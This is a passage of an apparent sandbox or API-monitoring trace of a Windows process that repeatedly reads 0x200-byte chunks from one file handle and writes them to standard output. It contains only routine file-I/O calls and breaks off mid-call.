ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.110] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.110] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.111] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.111] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] GetFileType (hFile=0x4c) returned 0x1 [0174.111] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.111] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.112] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.112] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.112] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.112] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.113] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.113] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.113] GetFileType (hFile=0x4c) returned 0x1 [0174.113] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] GetFileType (hFile=0x4c) returned 0x1 [0174.114] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.114] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.114] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.114] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.114] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] GetFileType (hFile=0x4c) returned 0x1 [0174.115] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.115] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.115] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.115] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.115] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] GetFileType (hFile=0x4c) returned 0x1 [0174.116] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.116] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.116] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.116] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.116] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f34c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f39c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f3ec*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f43c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f48c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f48c*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] GetFileType (hFile=0x4c) returned 0x1 [0174.117] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.117] WriteFile (in: hFile=0x4c, lpBuffer=0x18f4dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f4dc*, lpNumberOfBytesWritten=0x18e4e0*=0x20, lpOverlapped=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.117] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e4cc | out: lpNewFilePointer=0x0) returned 1 [0174.117] _get_osfhandle (_FileHandle=4) returned 0x54 [0174.117] ReadFile (in: hFile=0x54, lpBuffer=0x18f2fc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e4ec, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesRead=0x18e4ec*=0x200, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e4e0, lpOverlapped=0x0 | out: lpBuffer=0x18f2fc*, lpNumberOfBytesWritten=0x18e4e0*=0x50, lpOverlapped=0x0) returned 1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] GetFileType (hFile=0x4c) returned 0x1 [0174.118] _get_osfhandle (_FileHandle=1) returned 0x4c [0174.118] WriteFile (in: hFile=0x4c, 